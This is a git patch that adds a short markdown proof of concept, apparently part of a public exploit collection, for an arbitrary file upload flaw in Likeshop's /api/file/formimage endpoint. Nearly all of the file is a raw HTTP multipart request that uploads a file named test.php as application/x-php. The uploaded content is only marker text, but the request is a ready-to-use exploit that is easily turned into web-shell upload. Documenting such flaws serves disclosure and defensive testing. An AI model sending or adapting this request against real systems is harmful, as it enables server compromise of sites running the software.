From a091a1b22664f0b00963c36903d2511ca3b479a3 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 30 Apr 2024 12:34:08 +0800
Subject: [PATCH] =?UTF-8?q?Create=20Likeshop-formimage=E4=BB=BB=E6=84=8F?=
 =?UTF-8?q?=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 Likeshop-formimage任意文件上传.md | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 Likeshop-formimage任意文件上传.md

diff --git a/Likeshop-formimage任意文件上传.md b/Likeshop-formimage任意文件上传.md
new file mode 100644
index 0000000..0e2887e
--- /dev/null
+++ b/Likeshop-formimage任意文件上传.md
@@ -0,0 +1,20 @@
+## Likeshop-formimage任意文件上传
+
+
+## poc
+```
+POST /api/file/formimage HTTP/2
+Host: x.x.x.
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+Connection: close
+Content-Length: 201
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
+Accept-Encoding: gzip, deflate
+
+------WebKitFormBoundarygcflwtei
+Content-Disposition: form-data; name="file";filename="test.php"
+Content-Type: application/x-php
+
+This page has a vulnerability!
+------WebKitFormBoundarygcflwtei--
+```